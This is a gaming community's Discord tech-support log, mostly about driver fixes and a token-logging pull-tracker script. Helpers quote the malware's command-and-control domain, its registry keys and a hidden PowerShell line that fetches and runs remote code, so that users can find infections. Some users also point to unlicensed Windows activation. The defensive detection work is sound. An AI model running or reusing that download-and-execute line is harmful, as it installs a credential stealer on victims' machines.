#tech-support
1 messages ยท Page 124 of 1
insanely faster and has more stable connections

well time to view all, send a ss of recent 5 hardware error first
ok im using that currently
sooo is it fixable ?? ๐ญ
do i restart my pc or game after deleting hgdownload
Open up all the errors hardware and windows related
yes restart

delete hgdownload > reset pc > open endfield > enjoy
aight
RJ45, wired internet port on motherboard
you mean this?
i dont get any you saying ๐
Welp
oh boy
I have my conclusion
wifi = internet no wires! decent speed
ethernet = internet yes wire! best speed you can get
thanks ๐
yess??
so can someone update me? is it over or can I fix it ๐ญ
the next 5 in reliability monitor please 
i see it clearly now 
Okay gpu driver is fucked
broo marble aggelomoirai boss is hard or am i just bad
Windows components
can't even dodge some attacks
Stfu
no circle on ground or anything
skill issue definitely
alright gabi needs DDU right
will a clean reinstall fix everything magically?

nahh fr nobody can dodge that attack
wdym those attacks are easy
Can you please leave
you dont need to go that far 
for me
fighting that boss with Keyboard and mouse controls on PC was ultra difficult
but fighting that boss on the mobile phone version of endfield felt easier for me
guys there's an issue... please stop (not you Gabi)
hm should i be paranoid here my powershell logs recorded i pasted the command but the event viewer doesnt show it
i used endfieldtools and it shows in both
We are trying to solve an issue whoever is not needed here get out
Grab a controller with 2/4/6 back buttons. You can even do a 1 hand gaming moment 
apparently it can delete the event logs if it ran
what command? the one in the google doc?
I mean, if its the easiest way.. I wouldnt mind cleaning my drive
nah i checked all powershell history manually
as what xomori said, its the gpu driver going bonkers. youre on nvidia, yes?
has Gabi already done DDU?
not yet
I think he's on AMD
amd
yes but those dont rly work
i need to do a ddu every 4~ days until they fail on me
Get-Content (Get-PSReadlineOption).HistorySavePath
i used this and searched for "endfielf"
wdym it doesn't?
Who need a controller when you have 19 buttons
So what critical component failure windows gpu drivers failed to respond and tdr timeout
That's definitely wierd
like after I do a ddu, everythings fine, for a few days
Have you done the "sfc/scannow" yet?
no lemme try
ddu works as its intended; cleaning old drivers for the new one. ddu is not used to make drivers stable, its to download a stable driver without conflicts
Check the guide in pins
For a proper ddu and windows repair
yeah but if he has done this before, something other than the GPU drivers are going bonkers
wouldn't hurt to try again though
just did it today again ๐ญ
hence why we need gabi to do the sfc scan
a few more secs
aight
take your time 
.
Btw how long did you have this gpu, is it new or used?
i just got it resetted, so why do i still have my same login info for the device?
have you tried manually looking into event viewer and task scheduler? if running another powershell cmd doesnt show any results, it doesnt hurt to do it yourself
1 1/2 years, worked amazing. Only issue I had is some hardware acceleration problems I fixed with a tutorial in regedit
coz you just basically reinstalled your PC by using files on the cloud, it still retains your Microsoft login info
oh ok,
MY WALLPAPER RETAINS LEZZGGOOOOOO
What's your vram and hotspot temp when gaming?
@solemn nacelle, you still here?
i reset my pc while being disconnected from the internet. had same login info and all. its intended
last time I checked under 70 C, usually 50-60
you'll want to follow the steps in the guide that's listed in the pins
yes!
got it, its good to know so i can assume right im safe from that malware dogshit now?
i think im probably gonna stay from these sites from now on
Seems good.
after deleting hgdownload and restarting it didnt fix my problem
find for DISM & SFC keyword in pinned. should take a while 
remember, always think before you click
created this quick image if you're interested in doing any of this
disables power saving features for your ethernet
prevents throttling and micro-stuttering
yeah lesson learned, i barely use pull tracker sites thats why i thought there wouldnt be any problems
at the cost of like 2 more watts of constant consumption
check event viewer and task scheduler one more time. i did it to make sure absolutely nothing suspicious was lingering. if there are no findings, you are good to go! redownload your drivers, apps, programs and redistributables (if needed)
valuable lesson indeed ๐
how do i get there in the first place
thank you kind ๐
good question
found it
also this apparently down here too
along with a few other configurations i could add to the list
if there no logs, its all good right?
any ethernet adapter that applies to will have those configurations unlocked
ok now how do i get pass 0% releasing resources
switch to dx11 and back to vulkan
@agile tusk how do i check the one for the task scheduler?
Intel ethernet driver don't have issue with "power saving" feature like realtek
yes if you found nothing then safe to say your pc is free from the token logger. but now is a good time to practice the habit of checking event viewer/task scheduler/reliability monitor every few weeks to months. if you notice your pc suddenly being slow, try to remember if u ran any scripts/downloaded from a shady source. biggest advice we can give from this experience is to NOT run anything until you are 100% sure what it does. if you are still skeptical, you can ask us here
I see
if it isn't working for you,
navigate directly to the endfield exe, right click on it and check the box in the properties tab, afterwards click apply and launch the game from the exe directly, 
paste this into the leftmost path bar %ProgramFiles%/GRYPHLINK/games/EndField Game
been stuck like this since earlier, restarting the game doesn't work 
try to remember if u ran any scripts/downloaded from a shady source
would advise not to run any script, ever, unless you know exactly what it does for a fact
switch to DX11 and back to vulkan
done this too
yeye thats very true
follow the guide that's attached in the pins, in that case
good timing! we are also talking about this!
https://www.reddit.com/r/Endfield/s/Bd1hCCzg8W
there has been new updates to this post. see Task Scheduler guide in here
wait really? lol
this one?
still stuck, that's weird
ym this??
i just login this morning and it's fine
mine worked just now lol
follow this guide as well after trying this
started compiling shaders
noo help ๐ญ
if it isn't working for you,
navigate directly to the endfield exe, right click on it and check the box in the properties tab, afterwards click apply and launch the game from the exe directly, 
paste this into the leftmost path bar %ProgramFiles%/GRYPHLINK/games/EndField Game
literally did the first step
and make sure to have patience while waiting for it to finish ๐
holy forgot to remove the ping when copy pasting
my fault @meager marten
yea that website has been taken down after the recent findings frm community have detected a malware in the script when grabbing pulls 
what the hell
pull trackers am i right 
taken down? does that mean i can't access it?
-# :clueless:
What does pull tracker do? And why even use it for starter?
the site is offline last time i checked. dont even bother visiting it bro
okie dokie
alright this works for me, tysm! 
yeah i think imgood resetting, did the job and removing everything
btw ty zencrox, +1 credit
instead of sending 5 screenshots for a character/weapon, me and my friends just want to have a detailed pull history and compare our luck. its not that hard to understand why theres appeal in this. wish history gets removed after 6 months, and pull trackers help keep a record
yea its stupid to run random scripts where u cant even see the source code. lesson learned. we get it. now im doing this shit on my own and open a spreadsheet like god intended
im actually interested in seeing that pull tracker script for future reference. I do try to read and understand scripts scripts before I run them but Ive never noticed anything malicious in the ones I ran
I see, i'm glad that i treat gacha games like normal games and don't care much about pulling 
Is it still available somewhere? Send it via DM so its not in here
We dont want that in here
gacha game is a skill check, Reading
ima keep my distance away from sites like from now on tbh, anything that involves retrieve from my device a red flag
pen and paper beats digital 
back to suffering
It's a valuable lesson indeed 
OHH NO MY WORLD RECORD IS GONE ( i had like 2 millions ads/trackers blocked on brave......)
anything that asks for elevated prompts, or requires a script to run, i wouldn't do it unless there's a reputable person that can vouch it's going to do what it's intended to do, and only what it's intended to do, even then i personally wouldn't run it unless i myself was 100% certain of what it's actually going to do
frequent fandom browser?
yeah kinda stupid ngl, ima try to learn a bit from now on
sorry what?
I purchased items from the "Elastic Demand" tab, the credits were deducted but the items never appeared in my inventory; I've already restarted the game thinking it was a visual bug but nothing was added, so please investigate this situation.
Well usually these require file access because the pull history is in one of the temp files. But do scan any script you find before running it always
for valley its like that i think
I think that might be more of a #contact-us issue?
Scroll yt for 10m and it will easily reach nearly 1k ads blocked with ublock 
im not of a guy tbh
fandom wikipedia
scroll down, and there's ads blocking content on the page
its even worse on mobile.
i barely even check that site, feels crap
ublock origin my beloved
Sadly only ublock lite work with chrome...
very common wiki site that's devolved into a nightmare in the last couple of years, most in-the-know communities create their own wiki's on other sites, or host their own wiki's if possible
yippee my friends os reinstall went successfully
now unto the drivers and telemetry tools
oh wow microsoft gives u list on what have u deleted on the reset
70% of the screen real estate and then some is blocked by banner ads, scrolling ads, page ads, more ads, it's crazy
nah man i run the entire thing on chrome. not lite
How?
chrome likes to remove the extension for most users after a few days
there's alternative browsers out there which work perfectly fine
and there's different adblockers you can use which work for youtube or whatever still on the chrome web store
if youtube is detecting your adblocker (which it likely is for a lot people most of the time), you'll notice various features missing and slowdowns
Hmmm, i never notice that
https://www.reddit.com/r/uBlockOrigin/comments/1mtowwf/end_of_support_for_ubo_on_chrome_chromium/ @broken swift post from a mod from the sub. ever since manifest v2 was removed, i followed the guide. been many months now and goog didnt remove the extension. chromium.zip from the github > put it in a secure folder, unpack it in chrome extensions > profit
I see, i will save this. I will try it when i get home on the weekend
im glad im not part of the adblocker/youtube arms race
it isn't detecting your adblocker in that case
oh no chrome! well unfortunately my uni uses google
It's ublock lite with max block
if you launch a video and it takes a few seconds, or 5 - 30 seconds to load, you're being detected and youtube is causing you issues
doesn't work that great on youtube as it's detected afaik
but works great for every other site
Hmm, it's 3-4s for me
My laptop is in warranty and my rig is at home rn 
dayum
same if you notice other stuff like livestream chat replays vanishing, comments vanishing, shorts vanishing, etc - but this is due to changes that youtube has made to specifically cause trouble for adblockers
i personally experience only the video loading for 5-10s when first loading the page
Didn't happen for me, i guess i'm lucky?
But i wish there is an app like yt revanced on pc
i think people are unlucky those that experience further issues
the difference for me with a poor, detected adblocker has been 5s - 30s at most in the past
turned off, it's instant
yeah..
true true
so, no tech issues rn?
all fixed?
oh okie
my friend got an armory crate popup from the fresh os and i told her to say no to that shit ๐ฉ
damn really??
whyy
armory crate is fine if you don't pair it up with other softwares
i'd rather watch a black screen for a minute than get a terrible ad i don't want to see for 30 seconds
Gabi's issue hasn't been fixed yet
bloatware
hmm
her pc was built for her iirc
awww :(
does nothing but slow down and cause issues for your system
there's alternatives which work just as well, some have even more features
what about omen?
necessary bloatware i believe
armory crate, msi, razer synapse, all asscheeks. msi afterburner is what u only want from them
If she want to control rgb tell here to use signalrgb or openrgb
Tuning then msi afterburner
necessary? you mean that it's just good to have it but it's bloatware?
yup i use signalrgb myself but idk if she likes rgb stuff so 
for the configurations it has, i believe so
that's fair that's fair
though there's probably an alternative out there that lets you access the same exact features without all the bloat
controling gpu fans is a must for laptops

on laptop it's really hard to find one actually (i didn't find one myself)
Hi i suddenly experience fps drop after playing the game earlier
yeah, it's because youtube only rolls out the changes to a specific set of users (for pretty much every change they make), so you'll either be entirely unaffected
hmm
or you'll be in the selected group and half the site will be missing and running slow

did you update your gpu drivers recently? and specs (thx zencrox)
what are your system specifications, @keen field?
Tried restarting the game and my computer but its still not working. Anyone know what might be the problem? 5070TI + 9700X
Yes this morning
what's your driver version? have you updated in the last two weeks?
@tall acorn
revert using the DDU guide attached in the pins
๐
14 now i believe
Another Nvidia driver issue ๐ฅ
ok thank you let me take a look
this one no?
yup
alr
And btw this too 
Is this true?? I already done the step on how to check it but find nothing. Might try the detailed step next after this
PSA: EndfieldRecords dot com Pull Tracker has Malware Identified by Axanael. Avoid using the website
Full Detail: https://t.co/HDAx6g0yRF
#ArknightsEndfield #Endfield
yes it's true, it was flagged as running malware scripts behind your back (dunno the details)
Wht if i dont find the rouf.xyz after following the step?
Why do all of the feedback channels are suddenly read only?
it is true
if you have ever ran the pull tracker script even at least once, there is a chance
I canโt chat specifically in the feedback channels everywhere else I can, maybe itโs something to do with connection?
So wht should i do?? Even after i run a quick check like the post said and find nothing?
threads are read only, but you can interact with emojies to upvote it or not.
about the other feedback channel someone else might be able to answer your question, i can chat in those personally.
there is a limit of time between each messages in the feedback channel also, maybe it's why you can't
Oh like if the channel is old enough you just canโt send anything in it anymore? I canโt even send a message in one posted 30 minutes ago
Maybe you got lucky and didn't get the malware
check carefully not quickly. this is a tokenlogger so this should not be taken with a grain of salt. what were your findings in event viewer, task scheduler, and registry editor?
i believe you can only post in 6 hours intervals in those (yourself)
... So I am about to either have a mental breakdown or kill someone
can you maybe send a screenshot of that issue? idk
what happened max??
Ahh okay, I have a feedback thread that Iโm the creator of but I canโt even add or edit anything of my own
If you ever use their service, you should check everything
Nvm i find it, So wht should i do?
oh.. then someone else needs to help you
cooked
i am sorry. you are compromised.
make sure you are disconnected from the internet for now.
check task scheduler and registry editor. youll see what the malware does
Thanks for tryna help me out Fusion itโs appreciated,
Where do i see that?
@proven sundial what would you do
If you found out one of the domain admins passed his account password to an AA so stupid he can barely ssh into shit with handholding
To fix an issue possible incident on their own on some server, and just go home for the day?
im on mobile atm so let me redirect you to the doc https://docs.google.com/document/d/e/2PACX-1vR1sKcyZxATg-gbpHgb5lW7Xs6UGtxNG51Te4B5pk_3ePl-_IAP3fBisiAOt4BdgR4SyAczV2x_n9W0/pub
defuq
I was literally speechless
The dumb AA mofo straight up told me when asked what's going on
Evil lore occurs
Rm rf/
Everything
(AA for the not knowledgeable is Application Administration, IT sub-dep that manages the application layer of shit like webapps and the likes)
that even worst
anything out of the ordinary? (just making sure pls no hate, ik there is documentation)
But yeah honestly ... I would do nefarious stuff
Hey fellas, if I ran the malware code, and followed the doc instructions and found 2 events from the code when I used it but nothing else in the doc (tasks), am I still cooked (and need to reset windows)?
I am literally about to crash out
If I tell management the only competent windows admin will straight up get fired
check Actions and see if theres anything suspicious in each item. Custom Handler should be fine.. anything else red flag
Of course I won't, but it's still really fucking bad
That's a collision course with an ice mountain right there
But i'm not surprised
Like I get if you're busy
But at least announce that shit so someone can swap in
nothing at all from the task scheduler? how about registry editor?
(HKEY_CURRENT_USER) HKCU:\Software\Orutime\Lethreme
(HKEY_LOCAL_MACHINE) HKLM:\Software\Orutime\Lethreme```
Not pass DOMAIN ADMIN CREDENTIALS to an AA
They call that utter incompetence
Same like my boss
Just casually deleting 270 VMs
if you ever ran the script you should reinstall windows
yes
so, I never use endfield tracker, then am I safe?
I swear to god those credentials also have full access to the vSphere cluster
90% chance you're compromised, if you found evidence of the malware still on your system, you are 100% compromised
there was no orutime folder but shame i should just reset
The other day we counted 670 VMs
good job my child, you have learned the art of thinking before clicking
but I use https://endfieldtools.dev

Man, is there a simpler explanation from that doc? Kinda hard for me to follow it
I will unironically crash out
well, you want to wait for it to generate a registry key then??
idk im not good with tech
lol
Stay calm you are the smart one here
oh well lol
our advice is to reset windows entirely (i think)
do i trash my files too?
edit the original post, the #1461653979862925498 forums have been locked thanks to the helpful insight people have had in the discord feedback channel
IS IT THE SAME?
you can save important files in a USB i guess
well thankfully the malware doesn't harm personal files according to Zencrox
THANK FUCKING GOD
that's at least a good thing
I think Max is the only sane person running this company...
imagine it just deletes your folders one by one
that is the best solution we can find. if you have an external/other drive for backup and dont mind completely resetting everything, then proceed. but if you want your files intact, that is also an option. this malware so far is a setup typically seen for phishing attacks, but we also found out its a token logger.
so what you will do is reinstall windows, and clearing sessions/changing passwords of your account. do it for your gryphline account asap
but if you want to really be sure, back up your personal files before fully deleting Windows and installing it again
I left my company as the sane person

lol
what if the guy tried to login his bank credentials onto his PC, ain't that more important than the gryphline account?

Should i reset my password now or after i reset my device?
after is fine
@toxic atlas feel free to vent in my dms sometime
lmao
yeah i saw it on my way home and wiped my acc on phone immediately
dawg
Man, i just realize i forgot one of my email pass 
Bruh, we talking about Max here
Who says sysadmins are not deranged
dude I just felt the pain when you said sysadmins
๐ฅ
โ๏ธ @nova hound, @sweet rover
If I wasn't on a bus on my way home I'd be having a biblical level crashout
I think it may be better to just run your own vpn company
How do i see the list of the file that got removed?
during the reset process you'll get a list of removed files
I have to get back to c coding
example i took
just a question. why do you have so much .NET Framework SDKS installed?

you program?

Because he's pooping code
im so fucking hungry i should just order food yall 
huh
ive been assisting ppl here
who fasts nowadays
i foorgot to eat
go eat lol
Jeht i know you are a machine so just drink some motor oil

im just a silly girl
i have kinda lots of warning in event history thingy
you mean event viewer?
i need to reinstall windows too :/
yeah, forgot the name in english-
I already ran the script but it show nothing, can someone help me to copy and paste the script and send it to my dms? I already read the instructions below but i just want to double check and make sure the script actually run
as long as there's not critical failures which point to hardware errors, I don't think you need one
You are IT until proven otherwise
yeah but they're annoyingly taking up lots of space :/
and i get errors
lots actually
show
if the script to detect does not work, finding it yourself is quite easy actually
JESUS
How?
I PROMISE I DIDNT GO TO ENDFIELDRECORDS
Btw should i be changing the passwords saved on firefox or all passwords ive used cause no way iโll remember all accounts lol. Answer is probably B but just asking cause nothing better to do waiting
Oui oui francais
i also have THIS error
which went for about 2 hours
while i was Y cruncher
but they're also here and there
Event Viewer > on the left-hand side, Applications and Services Log > Microsoft > Windows > PowerShell > Operational.
let us know if there are any logs
arent those errors from your ram timings and testing
no, the ram test didn't detect any
went and ran the malware after we warned them not to... pull information was just too enticing, we're finished
hm who?
Mb wrong image
Thats the latest one
You need to reinstall some windows components did you mess with cpu cycles ?
wow you got the entire script and all... yup. 100% compromised. no worries, OS reinstall should erase everything
cpu cycles? wdym?
-45 all core PBO

Damn shit, thats the last thing i want to know after i find this 
it's nottt
safe undervolt is safe
it's like that for days months
I can smell it
not since yesterday
you can keep your files. its redownloading the drivers and programs thats really annoying. but give it 1-2 days, or depending on your internet. thing's will get back to normal 
y'all are schizo fr fr
drastic undervolts that make your CPU cores error correct like crazy is unsafe
playable
but unstable
Cpu core erros affect ram
but i don't have -45 undervolt rn.. i'm on -35 which is above stable
Aswell as integrity later on
-15 to -25 absolute maximum is recommended for most cores
-15 will be slightly unstable on some cores too
why you so sure of yourself dayum
if you want further than that, you'll have to take it at what it is, or stress test each individually core yourself
What exactly happened anyway ?
which takes quite the while
nothing, just errors in event viewer (if you're talking about me)
nothing serious will happen (aside from errors and potential crashes/corruption), just an undervolt
i'm just gonna run DISM and maybe install iso to repair windows files ig
fusion was tinkering with resolution and then cpu uv and then ram timings
potential man in the making
go king we support u
ram timings then cpu then res-
thx thx
tho my cpu has been at -30 UV for months (idk about 5-6)
Well dcom erros are related to cpu
dcom?
So whatever you messed with revert it
where do you see dcom errors
Distributedcomm
i just need to find a 23H2 iso
ohhh, okie i have a few
papa can we get a translation
Time for reinstall
nah
bro was not affected by malware but still needs reinstall 
system is falling apart, but it's still perfectly playable so we're good for now

if its not reaching snail levels of unresponsiveness then keep the ship sailing 
Just grab LTSC and forget about win11
what's that
download Linux
what did Linux ever do to you
nothing

Windows for ATMs and the likes
An official unbloated version of Windows 11
That is also on a separate update channel and doesn't get broken by the usual updates
hmm
anyone mind sending me link to download 23H2 windows in english please?
i'm begging
i'll save it on a USB so that i can reset anytime
also i think it doesn't find the files cuz i'm on 23H2 and it's no longer supported
Yo guys, i know this is a weird question but how do i reinstall windows safely, like there is one time i reinstall my device because i cant connect to wifi for some reason and it asked me to input the key again and i had to go to the offline store just to ask them to fix it

it on massgrave... how can you not find it
ye 23H2 no longer supported but check your DMs
... Just grab LTSC
Full reinstall (drive wipe) or just core reinstall (data stays, apps & settings go)?
Once i done the remove everything option and when i use the account that have the digital license, it still asked for the key
You know you can activate windows with a single PowerShell command, right?
if i know, im not going to ask that here 
when you reinstall OS, your key will still be there
Just skip the key pass during reinstall and activate after
Im serious bro its not
How?
?? me and a couple others have reinstalled windows while keeping files and we didnt have to reactivate it again
if it asks you for a key, skip it
The one i do are a complete wipe data
... The blue text saying "I don't have a key" right next to the key box?
you okay with losing all files then? alright2
Or remove everything before u reset it
Yeah im fine, after im done with the important file, Iโll immediately back up the data to gdrive
If you have a big enough USB, you can grab SDI-Origin, and download the drivers for your computer in it ahead of time
Bootable device?
Or at least the network drivers
Doesn't matter
Bootable for windows installer
Anything else for drivers & backup
You can even shove it onto the windows installer usb if it's big enough
Oh man now I have to uninstall all the default windows trash again :(
... LTSC
i was always told to use rufus to put that shit in a USB
Yeah, Rufus is just the best way to flash ISO files to USB drives (on windows)
yay
Welcome to Windows where bloatware is somewhat a necessity for Microslop

if it's free, you're the product ๐
record the windows key if you havent. if thats a commercial computer OEM then the key should be embedded into ur mobo and activated automatically. if u built that pc/actually bought a windows license, then u gotta enter if u have it. otherwise, just activate it later during the process bruh
The fact it's $200 and it sells your data is fucking comical to me
i remember there's a way to find the windows key you have rn, isn't there?
in registery or something
(you mean a dollar?
)
I mean free
Who tf pays for windows
i think they already removed that feature for newer Windows versions
hmm
... It's a single fucking command to activate it
without key?
Yes
wtf come dm immediately
The problem is, the one that activate the keys are the employee that sells the device to me, they said that if i reset my device then i just need to input the account that they give to me and it will activate automatically
what?
Yeah idk if u guys having a stroke reading that
so basically they own the copy of windows and not you?
as a french native, i am having worse than a stroke
Idk if that the exact wording
DM'd
I mean... Yeah, that's a thing for MS Store
Mb, i mean they the one that help to activate the windows. Idk if that gojng to help 
or probably they gave you an account that has a digital license on it
But needs Microsoft account
Yeah thats one
dw lol it's just skill issue from my part
Chat suddenly died huh
yes
Probably having a stroke after reading my message
lol same
Oh hey I found Pocky at a store
Do I get cookies & cream or strawberry flavor?
it normal
Im playing with Linux
Xomori Playing C coding
& Max is stunlock by his work
lol
good news for me bc i can finally break my fast with oatmeal 
BOTH
really up to you, i like cookies & cream
And I'm dealing with pains

Insanity
Wtf

Bombardino Crocodilo
Max just buy hydrox cookies

They need to fire whoever accepted that design

20 BUCKS?
"Proudly" 
hydrox mentioned ๐ฃ๏ธ ๐ฅ 
wait that's LEI
Food is food, as long as it's good I ain't gonna complain
nvm it's 4e
agree with you

Nah that's about โฌ4
yes
It's almost exactly 5 so it's easy to convert
dayum ok
RUM
It wasn't a secret lol
Missed an opportunity to say RAMania

I've been trough the doc files and reddit post and only found that event 4100 in event viewer. I also checked task scheduler and tried powershell script and return nothing. Does this mean no malicious code is running in my machine after using that tracker? or maybe I need to check something else?
Either way if you already ran the tracker it may already be rooted in your system
So it's recommended to reinstall Windows at best
Send the event screenshot
a reason why you do not use a 3rd party tracker to analyze your game's data
let us see the errors in event viewer 
also holy frick so many users using pull tracker
I am pull tracker user 
Anyone counting the instance for this issue?
they don't even know it's illegit they just enjoy that tool 
So many running a random command off the internet with admin
the amount of pekcak pull tracker user is normal
a lot of people use the script to detect the stuff in task scheduler but it doesnt work. what you need to do is find it manually by yourself. @upper wind
wish to become you 
one person used script > nothing > told to find it manually > bro was indeed cooked
yes
Wdym we're always dead here (inside)
Speaking of 3rd party app, my Hoyobuddy still doing auto login for the last 2 years, even though I haven't touch mihoyo game for a while
Guess their token never expired 
wtf
Uhuh
yea he did
Ye he did
why
It's this one, no creating script or something
Im going to complet reset my device now guys, wish me not to messed up again
Working is no fun 
cooked
sorry I was typing on the phone so I was slower to notice
imagine your boss wipe your 270vm for the work & called it a whoopies
i thought that was max issue?

nah xomori is vm guy
vm?
Virtual Machine
virtual machine..
max is linux and data guy
yes
huh..
wifeyyyyy wdymmm :(
wdym it didn't create a script, it tried to create one hence the error
overloaded issue
If you don't see any events there, right-click on Operational, then click on Enable Log
Right click on Operational, select Find... , and in the Find what box, search for the following:
rouf.xyz
HKCU:\Software\Orutime\Lethreme
HKLM:\Software\Orutime\Lethreme```
can you change your password when you use a gmail account to login?
no
When is PayPal going to be fixed?
ask dev
are you using Google login? or mail login?
google login

iirc Paypal payment method is currently suspended
anyone experiencing fps drops after the patch?
then you gotta pin an email address first to the account
either from the in-game account center, or from the gryphline account center by logging in with google 3rd party login
Nvidia?
yes
What your Nvidia driver ver.
Google login is ok
after that you'll be able to set a password
what driver version?
the latest one 595.71
REVERT
then roll back to the previous one
downgrade to either 591 or studio drivers
that shit is currently buggy rn
dam... what happend
well the thing is I only found this rouf.xyz in event viewer, not the other two below
+1 to the counter guys..
another one to the counter 
AI Drivers, that's what happened
wait im kinda confused cause when i login i just straight up use this one. is this what youre referring to?
yeah
your gryphline account is only bound to google
you gotta bind it to an email address as well, or it'll be pain to do later
Login with Google to HG account center > link an email there > set new password
Why even bother
or just from the in-game account center, in settings

okay so it's like this:
you should have a linked email but currently since you used google to sign in to the game, u only have a linked account
@cobalt furnace
so i gotta use 2 gmail accounts right
the 2nd one for linked email part
try these keywords instead Orutime and Lethreme. lmk if anything pops up
1
in your nvidia app under drivers > scroll down and you will see your old drivers > click the 3 dot & reinstall
just one
i tried linking the one i used but it says that its already registered
oh brother
that means you have 2 gryphline accounts
one by mail
one by google
thanks dude
i mean i did have a question back then about my account wait
mine says that what do i do (despite me loging in with google)
I created my Linked Email first before associating it with my Google
wdym?
@proven sundial malware C&C domain is gone
rouf.xyz got nuked
meaning, I created a Gryphline account first and then I linked my gmail after
so today's the last day
Quick i will take the domain
so what do i need to do rn i'm confused
this was in jan 28 btw i cancelled it cause no one answered that time
i sent an email to support but no reply so far
for clarification
yeah so what you need to do
assuming your game data is on the google-bound account
you already have a linked email on your Gryphline right?
login into that account that's pending deletion
change the email address on it (replace the last part from @gmail.com with @googlemail.com)
i only remember clicking google icon when logging in the game
then delete account
back on the google-bound account, bind the proper email address, with @gmail.com
i do have a grypline account that i created yesterday cuz of weird login rewards
Thanks for letting me know i have to code a lot
wdym delete.
let us know if u made a xomori-approved pull tracker 
Nope, noting found here
Xomori Logger that you wouldnt expect
Not a bad idea ...
yea. i logged in using my same gmail through this instead
so my acc will be gone? no thank you i love my laevatain..
and now im here
yeah, so your game data is most likely on the google-bound account
yep
log back into the google account in game
maybe it's already implanted in my system idk 
are you on task scheduler or event viewer right now?
so i can safely delete this gryphline account without losing the progress on my google bound account?
Should be
in browser, go here
https://user.gryphline.com/
login with the mail+pass
change the linked email address from @gmail.com to @googlemail.com (verification will arrive in the same inbox)
cancel account
then from game
go into settings, account center
bind the @gmail.com address
then set a password
Gryphline User Center
yeah
Anyway see you need to make simulations and such i'm tired AF
Why even bother making password account
I'm on event viewer rn
Work is driving me insane ahhh
alright lets move on to task scheduler.
Check the tasks that start with "Register-" by right clicking on the task and selecting Properties
Open the actions tab and see if any have malicious code, similar to:
"-NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command โiex (irm โrouf /./ xyz/uwโ)โ```
malware doesn't create scheduler tasks without C&C domain
so if the command was ran after the domain was taken down, it'll only be that one registry component
Also when I checked tak scheduler I didn't find any register name that has action like this
all the actions are named Custom Handler
aight i changed the emails from gmail 1 to gmail3 and ill use gmail1 for my google bound account now
thanks for letting me know. i just wanted to make sure if theres no need for an OS reinstall. its time-consuming
this tbh
when was the last time you used the script, if ever? we have new information that the domain is taken down just very recently.. but that doesnt erase the chances of the script being ran before
oh yeah i read up on the script earlier and its the rouf.xyz thing isnt it
yeah, that domain
i do not know when it was nuked, but it doesn't exist anymore
i only skimmed most of it but that part did not look legit at all to begin with, it touched parts of your system it would never need to read your pulls, which leads me to emphasize again:
read scripts before running them
if you dont know powershell feed it to claude and ask it what it does, at the very least
Asking gacha player to read?
I am a gacha player, I read
its ironic. im a gacha player but i also took up a course for pre-law. i should be reading shit 
currently its "seeing like a state" by James C Scott
I do read, I'm gacha player too
asking gacha player read is like making nvidia driver without ai
just dereference that pointer bro
AMD:
based from my browser history, it should around 02 Mar to this day and btw since when was the site created?
i believe around launch week of endfield, so a good 1 month of uptime
I know Im old, possibly the oldest in here but damn dont people read anymore
imagine your daughters sigterm it 
how old? in 40s? or 60s?
Nooooo
late 30s is enough to mog everyone here
WE dont read while doing gacha stuff 

HSR mobile player reaction:
good luck trying to mog me man i know kung fu
of Asian parents kung fu
And after using that website, I've noticed a strange powershell popup a day after turning on my machine
litterally cooked atp
Got asian parents too
Isn't HSR just a gear farming simulator
I think the script is already dead in this case
lore thing too
but since it ran for that long
its this part
who knows how many data they already got
and yes one account on gacha and one account to read lores, then battle and do the reverse

it can still be active
even when site is down
it schedules powershell execution of the thing
idk it's popped up so fast I can barely see the messsage tho
-UserID "SYSTEM" -LogonType ServiceAccount -RunLevelHighest

it is still active if it was ran while the site was up
if it was ran after it was taken down, it's only that one registry entry
yeah its very obvious something is VERY wrong with that script
this code alone is enough as a redflag

Hiii, is there something I can do about the ressources loading forever ? The game doesn't load at all, it just run empty. 
Yesterday I reinstalled which corrected my previous bug but now I havd this
HSR lore is like pretty short though
ah welp i was safe cuz i didnt rolled any banner other then standard and don have much friends to show the rolls 
-DontStopIfGoingOnBatteries, this is one fcked up script man
Is there any steps to prevent further dmg?

"short"
proceeds amphoreus the 4th time
if you're stuck on releasing resources, check the pins
switch to DX11 and back to vulkan
wait for the game to load afterwards
i only took a screenshot of a part of what someone posted on reddit, but yes. let this be a lessen to scan scripts you run, no script should EVER schedule anything
at least not one that is supposed to read your gacha pulls
or better yet, don't just run any program you find in the internet, especially if someone who made isn't too well known
the damage is done for some so im preaching to the choir but it needs to be repeated and beaten like a dead horse
think before you click as they say
I only played until Penacony sadly
well that kind of makes github a malware distributor
fair but still just think before you click
the internet is free to do research before you do anything stupid
Xomori 
i am going to admit however, that nearly every game has a site like this and i suppose at some point you let your guard down because the last 4 gacha tracker didnt do anything so why would this one
pull -> your information
tracker -> of your sensitive data
xD
but alas
that somehow eliminates the risk
there's a lot of unverified gacha trackers out there that will do the same exact thing more or less
they're just not commonly used and aren't as popular as the year old ones that are reputable
The game doesn't start either in DX11
u dont have to use pull tracker if u dont pull on the game 
if it isn't working for you,
navigate directly to the endfield exe, right click on it and check the box in the properties tab, afterwards click apply and launch the game from the exe directly, @light flame
paste this into the leftmost path bar %ProgramFiles%/GRYPHLINK/games/EndField Game
Hey i want to add that putting
TZ=UTC %command%
In launch options fixes a bug that crashes the game sometimes when timers are involved, like credits shop, regional management, and elastic goods trading. I still need to send the player log and report to support but based on the errors, this should fix it until they do.
exact sentiments, hence why me and my friend used said tracker
or at least if you do don't just run every fucking command on the internet as admin
just for shits and giggles i pulled the zzz tracker script and here we can see the only thing it accesses is the game path cache
the major endfield one was one of the earliest, barely verified and unreputable
Hmm, this is the first time I've ever seen crashing reported related to in-game timers. I'll look into this, thanks :3
that's why Linux user hate run as root

barely verified as in many people were using it, and there likely wasn't any malicious code when it first released
I can send you the player log too if you are curious
even with minimal knowledge its not hard to spot when a script is doing something it really shouldnt be doing
Sure
You can DM it to me so I don't lose it
this one is zzz rng moe? 
yes
so its safe?
i see nothing potentially harmful in the script, it really only finds the game dir and reads stuff from the cache file
how about the gfl2 one exillium moe
that is also down
then again after reinstalling windows in july i didnt used the site
well if its down i cant check the script well
Ah.. miss my gfl
im so sad they did so little with the xcom combat and its just "deploy 416 and auto"

but i cant drop it because ive been following the story for a decade now
and i need to see skk marry kalin
if it doesnt happen i will get upset
Still nothing 
It keep running empty
your sunborn id?
I dont remember it
bruh
I have bad memory for this kinda stuff
you should at least remember the email to recover...
did some people confirmed what's the malware type from the endfieldrecords website? since I only see people warning us
i have all my mail and game passwords in a seperate old laptop that barely runs and never connected to the internet

i cant tell you what exactly it does but it runs a scheduled powershell task
I have so many emails

